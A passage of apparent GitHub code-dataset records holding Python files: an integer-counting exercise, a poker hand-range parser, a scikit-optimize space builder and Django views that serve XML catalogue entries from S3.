1:\n\nEnter an integer, the input ends if it is 0: 1\n\nEnter an integer, the input ends if it is 0: 2\n\nEnter an integer, the input ends if it is 0: -1\n\nEnter an integer, the input ends if it is 0: 3\n\nEnter an integer, the input ends if it is 0: 0\n\nThe number of positives is 3\n\nThe number of negatives is 1\n\nThe total is 5\n\nThe average is 1.25\n\nSample Run 2\n\nSample Output 2:\n\nEnter an integer, the input ends if it is 0: 0\n\nNo numbers are entered except 0\n'''\n\nnum = int(input(\"Enter an integer, the input ends if it is 0: \"))\npos = 0\nneg = 0\ncount = 0\ntot = num\nif num > 0:\n pos+=1\nelif num < 0:\n neg+=1\nelif num == 0:\n print(\"No numbers are entered except 0\")\n quit()\n\nwhile num != 0:\n num = int(input(\"Enter an integer, the input ends if it is 0: \"))\n if num > 0:\n pos += 1\n elif num < 0:\n neg += 1\n count += 1\n tot += num\navg = tot/ count\nprint(\"The number of positives is: \", pos)\nprint(\"The number of negatives is: \", neg)\nprint(\"The total is\", tot)\nprint(\"The average is\", avg)\n","repo_name":"milnorms/pearson_revel","sub_path":"ch5/ch5p1.py","file_name":"ch5p1.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12478163638","text":"\nimport itertools, re\nfrom PtCard import Card\nfrom PtHand import Hand\nfrom PtDeck import Deck\nfrom PtHandTypesHoldem import (\n\t\tgenHandTypes, \n\t\tgenHandTypeTable,\n\t\thandTypeToHands, \n\t\thandTypeFromHand,\n\t\thandTypeIsPair,\n\t\thandTypeIsSuited,\n\t\t)\n#************************************************************************************\n#\n#************************************************************************************\n#NOTE: neither is this beast below 100% compatible to PokerTracker nor is it tested\n# in any depth.\nclass HandRangeHoldem(object):\n\t\"\"\"wrapper class for texas holdem hand ranges\n\t\n\tyou may initialize this class directly with a list of L{Hands}s or use the L{fromString}\n\tmethod to create a hand range from a standard hand range pattern. recognized patterns are:\n\t\n\trandom: all hands\n\tJhTd: a specific card\n\tAA: a pair\n\tTT+: all pairs ten or higher\n\t77-KK: all pairs 77 to KK\n\tKTs, KTo, KT: all suited, offsuit king ten combinations\n\tK6s+, K6o+, K6+: all suited, offsuit kings, king 6 to king jack\n\tKTs-K2s, KTo-K2o, KT-K2: all suited, offsuit king combinations king deuce to king ten\n\t\n\tseparate patterns by comma to form complex ranges: 'AA-99, ATs+, AJo+, 56s, 7h2c'\n\t\n\t@note: the KT (no suit qualifier) types are special to this implementation and\n\tonly recognized on input.\n\t\"\"\"\n\t\n\tclass ParseError(Exception): pass\n\t\n\tReRanks = '|'.join(Card.RankNames)\n\tReSuits = '|'.join(Card.SuitNames)\n\tReCard = '(%s)(%s)' % (ReRanks, ReSuits)\n\tPatHand = re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReCard, ReCard), re.X)\n\tPatHandTypePair = re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P=rank)\n\t\t\t\t\t(?P\\+)?\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % ReRanks, re.X)\n\tPatHandTypePairRange = re.compile('''\n\t\t\t\t\t\\A(?P%s)\n\t\t\t\t\t(?P=rank1)\n\t\t\t\t\t\\-\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P=rank2)\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReRanks, ReRanks), re.X)\n\tPatHandTypeSuit = re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?Ps|o)?\n\t\t\t\t\t(?P\\+)?\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReRanks, ReRanks), re.X)\n\tPatHandTypeSuitRange = re.compile('''\n\t\t\t\t\t\\A\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?Ps|o)?\n\t\t\t\t\t\\-\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?P%s)\n\t\t\t\t\t(?Ps|o)?\n\t\t\t\t\t\\Z\n\t\t\t\t\t''' % (ReRanks, ReRanks, ReRanks, ReRanks), re.X)\n\t\n\t@classmethod\n\tdef fromString(klass, string):\n\t\t\"\"\"creates a hand range from a string containg hand patterns\n\t\t@param string: (str) \n\t\t@return: L{HandRange}\n\t\t\n\t\t\"\"\"\n\t\thandRange = klass()\n\t\t# clean string\n\t\tp = string.replace(' ', '').replace('\\t', '')\n\t\tp = p.split(',')\n\t\tfor s in p:\n\t\t\tif not s: continue\n\t\t\t\t\t\n\t\t\tif s == 'random':\n\t\t\t\tdeck = Deck()\n\t\t\t\tfor cards in itertools.combinations(deck.cards, 2):\n\t\t\t\t\thand = Hand.fromCards(*cards)\n\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\telif s == 'suited':\n\t\t\t\tp.extend([\n\t\t\t\t\t\t'A2s+',\n\t\t\t\t\t\t'K2s+',\n\t\t\t\t\t\t'Q2s+',\n\t\t\t\t\t\t'J2s+',\n\t\t\t\t\t\t'T2s+',\n\t\t\t\t\t\t'92s+',\n\t\t\t\t\t\t'82s+',\n\t\t\t\t\t\t'72s+',\n\t\t\t\t\t\t'62s+',\n\t\t\t\t\t\t'52s+',\n\t\t\t\t\t\t'42s+',\n\t\t\t\t\t\t'32s+',\n\t\t\t\t\t\t])\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\telif s == 'offsuit':\n\t\t\t\tp.extend([\n\t\t\t\t\t\t'A2o+',\n\t\t\t\t\t\t'K2o+',\n\t\t\t\t\t\t'Q2o+',\n\t\t\t\t\t\t'J2o+',\n\t\t\t\t\t\t'T2o+',\n\t\t\t\t\t\t'92o+',\n\t\t\t\t\t\t'82o+',\n\t\t\t\t\t\t'72o+',\n\t\t\t\t\t\t'62o+',\n\t\t\t\t\t\t'52o+',\n\t\t\t\t\t\t'42o+',\n\t\t\t\t\t\t'32o+',\n\t\t\t\t\t\t])\n\t\t\t\tcontinue\n\t\t\t\n\t\t\telif s == 'broadways':\n\t\t\t\tp.extend([\n\t\t\t\t\t\t'TT+',\n\t\t\t\t\t\t'AT+',\n\t\t\t\t\t\t'KT+',\n\t\t\t\t\t\t'QT+',\n\t\t\t\t\t\t'JT+',\n\t\t\t\t\t\t])\n\t\t\t\tcontinue\n\t\t\telif s == 'pairs':\n\t\t\t\tp.append('22+')\n\t\t\t\tcontinue\t\n\t\t\t\t\t\t\n\t\t\t# substring is a hand --> 'Kh7d'\n\t\t\t#\n\t\t\tresult = klass.PatHand.match(s)\n\t\t\tif result is not None:\n\t\t\t\tcard1, card2 = Card(result.group('card1')), Card(result.group('card2'))\n\t\t\t\thand = Hand.fromCards(card1, card2)\n\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# substring is a handTypePair --> 'TT' or 'TT+'\n\t\t\t#\n\t\t\tresult = klass.PatHandTypePair.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank = result.group('rank')\n\t\t\t\thands = handTypeToHands(rank+rank)\n\t\t\t\tfor hand in hands:\n\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern if necessary\n\t\t\t\tqualifier = result.group('qualifier')\n\t\t\t\tif qualifier:\n\t\t\t\t\tiRank = Card.RankNames.index(rank)\n\t\t\t\t\tfor otherRank in Card.RankNames[iRank +1:]:\n\t\t\t\t\t\tp.append(otherRank + otherRank)\n\t\t\t\tcontinue\n\t\t\t\t\t\t\t\t\n\t\t\t# substring is a handTypeSuit --> 'KTs', 'KTs+', 'KTo' or 'KT'\n\t\t\t#\n\t\t\t#NOTE: PokerTracker handles 'KT' but not 'KT+', we do\n\t\t\tresult = klass.PatHandTypeSuit.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank1 = result.group('rank1')\n\t\t\t\trank2 = result.group('rank2')\n\t\t\t\trank1, rank2 = klass._sortedCardRanks(rank1, rank2, revert=True)\n\t\t\t\tsuit = result.group('suit')\n\t\t\t\tqualifier = result.group('qualifier')\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t# got a pair - assume typo - PokerStove does so as well (?)\n\t\t\t\tif rank1 == rank2:\n\t\t\t\t\tif qualifier:\n\t\t\t\t\t\tp.append('%s%s%s' % (rank1, rank1, qualifier))\n\t\t\t\t\telse:\n\t\t\t\t\t\tp.append('%s%s' % (rank1, rank1))\n\t\t\t\t\tcontinue\n\t\t\t\t\t\t\t\n\t\t\t\tif suit:\n\t\t\t\t\thands = handTypeToHands(rank1+rank2+suit)\n\t\t\t\telse:\n\t\t\t\t\thands = handTypeToHands(rank1+rank2+'s') + handTypeToHands(rank1+rank2+'o')\n\t\t\t\tfor hand in hands:\n\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern if necessary\n\t\t\t\tif qualifier:\n\t\t\t\t\tiRank1 = Card.RankNames.index(rank1)\n\t\t\t\t\tiRank2 = Card.RankNames.index(rank2)\n\t\t\t\t\tfor otherRank in Card.RankNames[iRank2 +1:iRank1]:\n\t\t\t\t\t\tif otherRank == rank1: continue\n\t\t\t\t\t\tif suit:\n\t\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + otherRank + suit):\n\t\t\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + otherRank + 's'):\n\t\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + otherRank + 'o'):\n\t\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\t\n\t\t\t# substring is a handTypePairRange --> '22-TT'\n\t\t\t#\n\t\t\tresult = klass.PatHandTypePairRange.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank1 = result.group('rank1')\n\t\t\t\trank2 = result.group('rank2')\n\t\t\t\trank1, rank2 = klass._sortedCardRanks(rank1, rank2, revert=False)\n\t\t\t\tiRank1 = Card.RankNames.index(rank1)\n\t\t\t\tiRank2 = Card.RankNames.index(rank2)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern\n\t\t\t\tranks = Card.RankNames[iRank1:iRank2+1]\n\t\t\t\tfor rank in ranks:\n\t\t\t\t\tfor hand in handTypeToHands(rank + rank):\n\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\t\t\t\t\n\t\t\t# substring is a handTypeSuiteRange --> 'K7s-KTs', 'KT-K7', 'KTo-K7', ...\n\t\t\t#\n\t\t\tresult = klass.PatHandTypeSuitRange.match(s)\n\t\t\tif result is not None:\n\t\t\t\trank1 = result.group('rank1')\n\t\t\t\trank2 = result.group('rank2')\n\t\t\t\trank1, rank2 = klass._sortedCardRanks(rank1, rank2, revert=True)\n\t\t\t\trank3 = result.group('rank3')\n\t\t\t\trank4 = result.group('rank4')\n\t\t\t\trank3, rank4 = klass._sortedCardRanks(rank3, rank4, revert=True)\n\t\t\t\t# sort rank2 and 4 once again so we get ascending ranks for expanding\n\t\t\t\trank2, rank4 = klass._sortedCardRanks(rank2, rank4, revert=False)\n\t\t\t\tif rank1 != rank3:\n\t\t\t\t\traise klass.ParseError('invalid range: %s' % s)\n\t\t\t\t# determine suit\n\t\t\t\tsuit1 = result.group('suit1')\n\t\t\t\tsuit2 = result.group('suit2')\n\t\t\t\tif suit1:\n\t\t\t\t\tsuit = suit1\n\t\t\t\telif suit2:\n\t\t\t\t\tsuit = suit2\n\t\t\t\telse:\n\t\t\t\t\tsuit = None\n\t\t\t\t\t\t\t\n\t\t\t\t# expand pattern\n\t\t\t\tiRank2 = Card.RankNames.index(rank2)\n\t\t\t\tiRank4 = Card.RankNames.index(rank4)\n\t\t\t\tranks = Card.RankNames[iRank2:iRank4+1]\n\t\t\t\tfor rank in ranks:\n\t\t\t\t\tif suit:\n\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + rank + suit):\n\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + rank + 's'):\n\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\t\t\tfor hand in handTypeToHands(rank1 + rank + 'o'):\n\t\t\t\t\t\t\thandRange._hands.add(hand)\n\t\t\t\tcontinue\n\t\t\t\n\t\t\t#\n\t\t\traise klass.ParseError('invalid hand pattern: %s' % s)\t\n\t\t\n\t\t# finally\t\t\n\t\treturn handRange\n\t\t\t\n\t@classmethod\n\tdef _sortedCardRanks(self, rank1, rank2, revert=False):\n\t\tiRank1 = Card.RankNames.index(rank1)\n\t\tiRank2 = Card.RankNames.index(rank2)\n\t\tif revert and iRank1 < iRank2:\n\t\t\treturn (rank2, rank1)\n\t\telif not revert and iRank2 < iRank1:\n\t\t\treturn (rank2, rank1)\n\t\treturn (rank1, rank2)\n\t\t\n\tdef __init__(self, hands=None):\n\t\t\"\"\"\n\t\t@param hands: (list) or L{Hand}s or None to create an empty hand range\n\t\t\"\"\"\n\t\tself._hands = set() if hands is None else set(hands)\n\t\t\t\t\n\tdef __contains__(self, hand):\n\t\treturn hand in self._hands\n\t\t\n\tdef __len__(self):\n\t\treturn len(self._hands)\n\t\t\n\tdef __iter__(self):\n\t\treturn iter(self._hands)\n\t\t\n\tdef toString(self):\n\t\t\"\"\"dumps the hand range to a string representing a hand range pattern\n\t\t@return: (str)\n\t\t\"\"\"\n\n\t\tif len(self) == 1326:\n\t\t\treturn 'random'\n\t\t\n\t\t# precompute hand types of our hands\n\t\thandTypes = dict([(handType, []) for handType in genHandTypes()])\n\t\tfor hand in self:\n\t\t\thandType = handTypeFromHand(hand)\n\t\t\thandTypes[handType].append(hand) \n\t\t\n\t\t# dump our hands to handType table\n\t\thandTypeTable = genHandTypeTable()\n\t\tfor row in handTypeTable:\n\t\t\tfor iCol, handType in enumerate(row):\n\t\t\t\t# assign dict handTypeData to each cell\n\t\t\t\tif handTypeIsPair(handType):\n\t\t\t\t\tnCardsExpected = 6\n\t\t\t\t\ttype = 'pair'\n\t\t\t\t\trank = Card.RankNames.index(handType[0])\n\t\t\t\t\trankSignificant = Card.RankNames.index(handType[0])\n\t\t\t\t\tnCardsExpected = 6\n\t\t\t\telif handTypeIsSuited(handType):\n\t\t\t\t\ttype = 'suited'\n\t\t\t\t\tnCardsExpected = 4\n\t\t\t\t\trank = Card.RankNames.index(handType[0])\n\t\t\t\t\trankSignificant = Card.RankNames.index(handType[1])\n\t\t\t\telse:\n\t\t\t\t\ttype = 'offsuit'\n\t\t\t\t\tnCardsExpected = 12\n\t\t\t\t\trank = Card.RankNames.index(handType[0])\n\t\t\t\t\trankSignificant = Card.RankNames.index(handType[1])\t\n\t\t\t\trow[iCol] = {\n\t\t\t\t\t\t'type': type,\n\t\t\t\t\t\t'handType': handType,\n\t\t\t\t\t\t'rank': rank,\n\t\t\t\t\t\t'rankSignificant': rankSignificant,\n\t\t\t\t\t\t'nCardsExpected': nCardsExpected,\n\t\t\t\t\t\t'hands': handTypes[handType],\n\t\t\t\t\t\t}\n\t\t\t\t\t\t\n\t\t# expand handTypeTable in traverse order\n\t\thandTypes = []\n\t\tfor delta in xrange(13):\n\t\t\tpair = handTypeTable[delta][delta]\n\t\t\thandTypes.append(pair)\n\t\t\tsuited = [handTypeTable[delta][i] for i in xrange(delta +1, 13)]\n\t\t\thandTypes.extend(suited)\n\t\t\toffsuit = [handTypeTable[i][delta] for i in xrange(delta +1, 13)]\n\t\t\thandTypes.extend(offsuit)\n\t\t\n\t\t# accumulate hands to ranges\n\t\tranges = {'pair': [], 'suited': [], 'offsuit': []}\n\t\tfor handTypeData in handTypes:\n\t\t\trng = ranges[handTypeData['type']]\n\t\t\tif not handTypeData['hands']:\n\t\t\t\tcontinue\n\t\t\tif len(handTypeData['hands']) == handTypeData['nCardsExpected']:\n\t\t\t\tif not rng:\n\t\t\t\t\trng.append([])\n\t\t\t\tlastSlc = rng[-1]\n\t\t\t\tif not lastSlc:\n\t\t\t\t\tlastSlc.append(handTypeData)\n\t\t\t\telif lastSlc[-1]['nCardsExpected'] != len(lastSlc[-1]['hands']):\n\t\t\t\t\trng.append([handTypeData,] )\n\t\t\t\telse:\n\t\t\t\t\trankCurrent = handTypeData['rank']\n\t\t\t\t\trankSignificantCurrent = handTypeData['rankSignificant']\n\t\t\t\t\trankLast = lastSlc[-1]['rank']\n\t\t\t\t\trankSignificantLast = lastSlc[-1]['rankSignificant']\n\t\t\t\t\t# case pairs\n\t\t\t\t\tif handTypeData['type'] == 'pair':\n\t\t\t\t\t\tif rankSignificantCurrent +1 == rankSignificantLast:\n\t\t\t\t\t\t\tlastSlc.append(handTypeData)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trng.append([handTypeData,] )\n\t\t\t\t\t#case unpaired hands\n\t\t\t\t\telse:\n\t\t\t\t\t\tif rankLast == rankCurrent and \\\n\t\t\t\t\t\t\t\trankSignificantCurrent +1 == rankSignificantLast:\n\t\t\t\t\t\t\tlastSlc.append(handTypeData)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\trng.append([handTypeData,] )\t\n\t\t\telse:\n\t\t\t\trng.append([handTypeData,] )\n\t\t\t\t\n\t\t# process ranges\n\t\tresult = []\n\t\tfor rngName in ('pair', 'suited', 'offsuit'):\n\t\t\trng = ranges[rngName]\n\t\t\tfor slc in rng:\n\t\t\t\tif len(slc) > 1:\n\t\t\t\t\t# slice is a range of hands\n\t\t\t\t\tif slc[0]['type'] == 'pair' and slc[0]['rankSignificant'] == 12:\n\t\t\t\t\t\t# handle special case like: 'TT+'\n\t\t\t\t\t\tresult.append( '%s+' % slc[-1]['handType'])\n\t\t\t\t\telif slc[0]['rankSignificant'] +1 == slc[0]['rank']:\n\t\t\t\t\t\t# handle special case like: 'KTs+', 'KTo+'\n\t\t\t\t\t\tresult.append( '%s+' % slc[-1]['handType'])\t\t\t\t\n\t\t\t\t\telse:\n\t\t\t\t\t\tresult.append( '%s-%s' % (slc[0]['handType'], slc[-1]['handType']))\n\t\t\t\telif len(slc[0]['hands']) == slc[0]['nCardsExpected']:\n\t\t\t\t\t# slice is a single handType containing all cards for the handType\n\t\t\t\t\tresult.append(slc[0]['handType'])\n\t\t\t\telse:\n\t\t\t\t\t# slice is a single HandType with not enough cards to cmplete the handType\n\t\t\t\t\tfor hand in slc[0]['hands']:\n\t\t\t\t\t\ts = hand.toString()\n\t\t\t\t\t\ts = s.replace('[', '').replace(']', '').replace('\\x20', '')\n\t\t\t\t\t\tresult.append(s)\n\t\t\t\t\t\t\n\t\treturn ', '.join(result)\n","repo_name":"minafaw/tablecrab","sub_path":"src/Tc2Lib/PtHandRangeHoldem.py","file_name":"PtHandRangeHoldem.py","file_ext":"py","file_size_in_byte":12111,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"42598004737","text":"import skopt\n\n\ndef skopt_space(hyper_to_opt):\n \"\"\"Create space of hyperparameters for the gaussian processes optimizer.\n\n This function creates the space of hyperparameter following skopt syntax.\n\n Parameters:\n hyper_to_opt (dict): dictionary containing the configuration of the\n hyperparameters to optimize. This dictionary must follow the next\n syntax:\n\n .. code:: python\n\n hyper_to_opt = {'hyperparam_1': {'type': ...,\n 'range: ...,\n 'step': ...},\n 'hyperparam_2': {'type': ...,\n 'range: ...,\n 'step': ...},\n ...\n }\n\n See the oficial documentation for more details.\n\n Returns:\n list: space of hyperparameters following the syntax required by the\n gaussian processes optimization algorithm.\n\n Example::\n\n hyper_top_opt = {\n 'cnn_rnn_dropout':{\n 'type': 'uniform',\n 'range': [0,1]},\n 'optimizer_type':{\n 'type': 'choice',,\n 'range': ['Adadelta', 'Adam', 'RMSProp', 'SGD']},\n 'base_learning_rate':{\n 'type': 'loguniform',\n 'range': [-5, 0]},\n 'layer1_filters':{\n 'type': 'quniform',\n 'range': [16, 64],\n 'step': 1}}\n\n Raises:\n KeyError: if ``type`` is other than ``uniform``, ``quniform``,\n ``loguniform`` or ``choice``.\n \"\"\"\n\n space = []\n # loop over the hyperparameters to optimize dictionary and add each\n # hyperparameter to the space\n for key, items in hyper_to_opt.items():\n if items['type'] == 'uniform':\n space.append(skopt.space.Real(items['range'][0],\n items['range'][1],\n name=key))\n elif items['type'] == 'quniform':\n space.append(skopt.space.Integer(items['range'][0],\n items['range'][1],\n name=key))\n elif items['type'] == 'loguniform':\n space.append(skopt.space.Real(items['range'][0],\n items['range'][1],\n name=key,\n prior='log-uniform'))\n elif items['type'] == 'choice':\n space.append(skopt.space.Categorical(items['range'],\n name=key))\n else:\n raise KeyError('The gaussian processes optimizer supports only \\\n uniform, quniform, loguniform and choice space types')\n return space\n","repo_name":"ctlearn-project/ctlearn_optimizer","sub_path":"src/ctlearn_optimizer/bayesian_gp.py","file_name":"bayesian_gp.py","file_ext":"py","file_size_in_byte":2946,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"44046034432","text":"from django.conf import settings\nfrom django.shortcuts import render, redirect\nfrom django.http import HttpResponse, Http404, HttpResponseRedirect\nfrom .models import CatalogueEntries\nfrom .graph import make_graphs\nfrom .forms import DocumentForm\nfrom .models import SubmittedCatelogueEntries\nfrom urllib.request import urlopen\n\nimport os\nfrom io import BytesIO\nimport xml.dom.minidom\nimport xml.etree.ElementTree as ET\nimport zipfile\nimport boto3\n\nALL_DOWNLOAD_GROUP = []\nSEARCH_DOWNLOAD_GROUP = []\nSG_FILE = None\ns3 = boto3.resource('s3', region_name=settings.AWS_S3_REGION_NAME)\nbucket = s3.Bucket(settings.AWS_BUCKET)\n\n\ndef get_names(directory):\n \"\"\"\n Returns a list of file names and a list of directories\n within the location of \"directory\"\n \"\"\"\n contents = os.listdir(directory)\n files, directories = [], []\n for item in contents:\n candidate = os.path.join(directory, item)\n if os.path.isdir(candidate):\n directories.append(item)\n else:\n files.append(item)\n return files, directories\n\n\ndef _get_abs_virtual_root():\n return settings.PUBLISHED_CATALOGUE_DIR\n\n\ndef download(request, path):\n if os.path.exists(path):\n rel_path = os.path.relpath(path, start=settings.AWS_URL)\n url = bucket.get_key(rel_path).generate_url(expires_in=1200)\n return HttpResponseRedirect(url)\n\n\ndef _make_zip(zip_subdir, files):\n zip_filename = \"%s.zip\" % zip_subdir\n s = BytesIO()\n zf = zipfile.ZipFile(s, \"w\")\n for fpath in files:\n subdir = os.path.relpath(fpath, start=settings.PUBLISHED_CATALOGUE_DIR)\n data = \"\\n\".join(_get_xml_content(fpath))\n zf.writestr(subdir, data)\n zf.close()\n resp = HttpResponse(s.getvalue(), content_type=\"application/x-zip-compressed\")\n resp['Content-Disposition'] = 'attachment; filename=%s' % zip_filename\n return resp\n\n\ndef all_catalogue_download(request):\n global bucket\n client = boto3.client(\"s3\", region_name=settings.AWS_S3_REGION_NAME)\n rel_path = os.path.relpath(settings.ALL_ENTRIES_DOWNLOAD, start=settings.AWS_URL)\n url = client.generate_presigned_url(\n 'get_object',\n Params = {\n 'Bucket': settings.AWS_BUCKET,\n 'Key': rel_path, },\n ExpiresIn=600, )\n return HttpResponseRedirect(url)\n\n\ndef search_download(request):\n global SEARCH_DOWNLOAD_GROUP\n if SEARCH_DOWNLOAD_GROUP:\n files = list()\n zip_subdir = \"searched_catalogue_entries\"\n for file in SEARCH_DOWNLOAD_GROUP:\n files.append(file)\n resp = _make_zip(zip_subdir, files)\n return resp\n else:\n raise TypeError(\"Files path are not set correctly.\")\n\n\ndef download_material(request, mode):\n global bucket\n if mode == \"anno\":\n rel_path = os.path.relpath(settings.ANNO_PATH, start=settings.AWS_URL)\n elif mode == \"xsd\":\n rel_path = os.path.relpath(settings.XSD_PATH, start=settings.AWS_URL)\n client = boto3.client(\"s3\", region_name=settings.AWS_S3_REGION_NAME)\n url = client.generate_presigned_url(\n 'get_object',\n Params={\n 'Bucket': settings.AWS_BUCKET,\n 'Key': rel_path, },\n ExpiresIn=600, )\n return HttpResponseRedirect(url)\n\n\ndef _stylize_graphs(tree, file_path, target_graph_dir, content):\n global bucket\n prefix = os.path.relpath(target_graph_dir, settings.AWS_URL)+'/'\n images = bucket.objects.filter(Delimiter='/', Prefix=prefix)\n if images:\n content[\"graphs\"] = [settings.AWS_URL+img.key for img in images]\n else:\n make_graphs(tree, file_path, settings.GRAPH_DIR)\n try:\n graphs = os.listdir(target_graph_dir)\n content[\"graphs\"] = graphs\n except FileNotFoundError:\n content[\"graphs\"] = None\n\n\ndef _view_file(request, file_path, mode):\n data = _list_directory(request, status='published')\n\n content = {\n 'ordered_keys': data[\"ordered_keys\"],\n 'files': data[\"files\"],\n 'sub_dirs': data[\"sub_dirs\"],\n 'file_path': file_path\n }\n\n if mode == \"style\":\n tree = _get_xml_tree(file_path)\n styled_info = _get_xml_styled(tree)\n content[\"mode\"] = mode\n target_graph_dir = os.path.join(settings.GRAPH_DIR, os.path.splitext(os.path.basename(file_path))[0])\n\n if styled_info:\n for key, val in styled_info.items():\n content[key] = val\n\n _stylize_graphs(tree, file_path, target_graph_dir, content)\n\n elif mode == \"text\":\n file_content = _get_xml_content(file_path)\n content[\"file_content\"] = file_content\n content[\"mode\"] = mode\n content[\"test\"] = \"test\"\n return render(request, \"catalogue/catalogue_view.html\", content)\n\n\ndef _get_xml_content(xml_url):\n xml_string = []\n for line in urlopen(xml_url):\n xml_string.append(line.decode('utf-8'))\n xml_string = \"\\t\".join(xml_string)\n dom = xml.dom.minidom.parseString(xml_string)\n file_content = []\n for line in dom.toprettyxml().split('\\n'):\n if len(line.strip()) != 0:\n file_content.append(line)\n return file_content\n\n\ndef _get_xml_tree(xml_url):\n xml_string = []\n for line in urlopen(xml_url):\n xml_string.append(line.decode('utf-8'))\n xml_string = \"\\t\".join(xml_string)\n return ET.ElementTree(ET.fromstring(xml_string))\n\n\ndef _get_xml_styled(tree):\n \"\"\"\n De-serialization of xml files into dictionaries\n \"\"\"\n try:\n concept = tree.getroot().find(\"concept\")\n if concept:\n info = concept.find(\"info\").attrib\n concept_id = info[\"id\"]\n name = info[\"name\"]\n version = info[\"version\"]\n framenet_link = info[\"frameNetLink\"] if \"frameNetLink\" in info.keys() else None\n roles = concept.find(\"roles\")\n core_roles = [core_role.text for core_role in roles.findall(\"./coreRoles/coreRole\")]\n non_core_roles = [non_core_role.text for non_core_role in roles.findall(\"./nonCoreRoles/nonCoreRole\")]\n description = concept.find(\"description\").text\n super_classes = [super_class.text for super_class in concept.findall(\"./superClasses/class\")]\n examples = [example.text for example in concept.findall(\"./examples/example\")]\n if not examples:\n examples = [\"None\"]\n style_content = {\n \"concept_id\": concept_id,\n \"name\": name,\n \"version\": version,\n \"core_roles\": core_roles,\n \"non_core_roles\": non_core_roles,\n \"description\": description,\n \"super_classes\": super_classes,\n \"examples\": examples\n }\n if framenet_link:\n style_content[\"framenet_link\"] = framenet_link\n else:\n style_content = None\n except Exception:\n raise ValueError(\"xml file poorly constructed!\")\n return style_content\n\n\ndef _get_link_target(path):\n link_target = os.path.relpath(path, start=settings.PUBLISHED_CATALOGUE_DIR)\n return link_target\n\n\ndef _to_lower(text):\n return text.lower()\n\n\ndef _make_sort_key(subdir, basename):\n if subdir == '':\n sort_key = os.path.splitext(basename)[0]\n else:\n sort_key = subdir\n return sort_key\n\n\ndef _sort_all_keys(all_files_info, all_dir_info):\n key_order = sorted(list(all_files_info.keys()) + list(all_dir_info.keys()))\n return key_order\n\n\ndef _get_all_files_from_db(status=\"published\"):\n return list(CatalogueEntries.objects.all())\n\n\ndef _list_directory(request, status='published'):\n if check_access(request):\n if status == 'published':\n all_files_info = {}\n all_dir_info = {}\n global ALL_DOWNLOAD_GROUP\n ALL_DOWNLOAD_GROUP.clear()\n for entry in _get_all_files_from_db():\n path = entry.entry_path\n basename = entry.entry_name\n subdir = entry.belongs_to_sub_directory\n sort_key = _make_sort_key(subdir, basename)\n link_target = subdir+\"/\"+basename\n ALL_DOWNLOAD_GROUP.append(path)\n if subdir == '':\n all_files_info[sort_key] = (link_target, basename)\n else:\n if sort_key not in all_dir_info.keys():\n all_dir_info[sort_key] = [\n (link_target, basename)]\n else:\n all_dir_info[sort_key].append(\n (link_target, basename))\n\n for key, val in all_dir_info.items():\n all_dir_info[key] = [\n tup for tup in sorted(\n val, key=lambda v:v[1])]\n ordered_keys = _sort_all_keys(\n all_files_info, all_dir_info)\n data = {\n 'ordered_keys': ordered_keys,\n 'files': all_files_info,\n 'sub_dirs': all_dir_info,\n }\n return data\n\n raise PermissionError\n\n\ndef check_access(request):\n \"\"\"Check if the user has proper access\"\"\"\n return True\n\n\ndef browse(request, path, mode):\n \"\"\"Directory list view\n There is a possibility that this function is going to be used somewhere else\n In which case, there should be an independent app in the project\n But we'll see if there's this need. I'll change accordingly.\n \"\"\"\n catalogue_path = os.path.join(settings.PUBLISHED_CATALOGUE_DIR, path)\n\n if catalogue_path.endswith('.xml'):\n if mode == \"\":\n mode = \"text\"\n return _view_file(request, catalogue_path, mode)\n else:\n return render(\n request,\n 'catalogue/catalogue_view.html',\n _list_directory(\n request, status='published'))\n # If the path points to a file, view it. If not, list out files in the\n # directory\n\n\ndef _search_files(request, query):\n matched_files_links = []\n global SEARCH_DOWNLOAD_GROUP\n SEARCH_DOWNLOAD_GROUP.clear()\n if len(query.strip()) != 0:\n 